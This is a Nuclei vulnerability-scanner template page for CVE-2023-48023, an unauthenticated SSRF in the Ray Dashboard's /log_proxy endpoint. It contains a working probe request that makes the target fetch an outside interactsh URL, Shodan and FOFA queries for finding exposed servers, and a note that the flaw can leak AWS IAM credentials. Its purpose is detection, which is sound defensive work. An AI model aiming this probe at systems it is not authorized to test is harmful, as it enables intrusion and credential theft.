Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
ID: CVE-2023-48023
Severity: critical
Author: cookiehanhoan,harryha
Tags: cve,cve2023,ssrf,ray,anyscale,Anyscale
Description
Section titled “Description”The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
YAML Source
Section titled “YAML Source”id: CVE-2023-48023
info: name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery author: cookiehanhoan,harryha severity: critical description: | The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid. impact: | The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability. remediation: Update to the latest version reference: - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0 - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/ - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054 - https://nvd.nist.gov/vuln/detail/CVE-2023-48023 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-48023 cwe-id: CWE-441,CWE-918 metadata: verified: true max-request: 1 vendor: ray_project shodan-query: - http.favicon.hash:463802404 - http.html:"ray dashboard" product: ray fofa-query: - icon_hash=463802404 - body="ray dashboard" tags: cve,cve2023,ssrf,ray,anyscale,Anyscale
http: - method: GET path: - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - "<h1> Interactsh Server </h1>"# digest: 490a00463044022024800206376636f832e86eee353474fb383bfed46802b9ada0b0a05dd7275d800220768ec72e0cb2b03ab786faaee1916e4155f02f9e0d0f354fa6ec545e992e6d40:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-48023.yaml"